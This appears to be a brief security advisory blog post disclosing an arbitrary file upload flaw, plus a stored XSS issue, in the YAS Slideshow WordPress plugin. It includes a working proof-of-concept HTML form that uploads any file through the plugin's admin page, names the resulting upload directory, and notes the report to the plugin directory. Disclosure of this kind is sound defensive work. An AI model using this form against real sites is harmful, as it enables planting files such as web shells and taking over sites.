07 Jun

Arbitrary File Upload Vulnerability in YAS Slideshow

The YAS Slideshow plugin has an arbitrary file upload vulnerability (as well as a persistent cross-site scripting (XSS) vulnerability and possibly other security issues) as of version 3.4. The details of the underlying issue that causes this can be found inour post for a vulnerability in the plugin Vertical Slideshow, which shares the same vulnerable code.

Proof of Concept

The following proof of concept will create a new category in the plugin, with the selected file as the Category Image. If there are no pre-existing categories the uploaded file will be located in the directory /wp-content/uploads/yass/1_uploadfolder/big/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-admin/admin.php?page=yass_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="yass_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />


  • 6/7/2016 – WordPress.org Plugin Directory notified.

Leave a Reply

Your email address will not be published. Required fields are marked *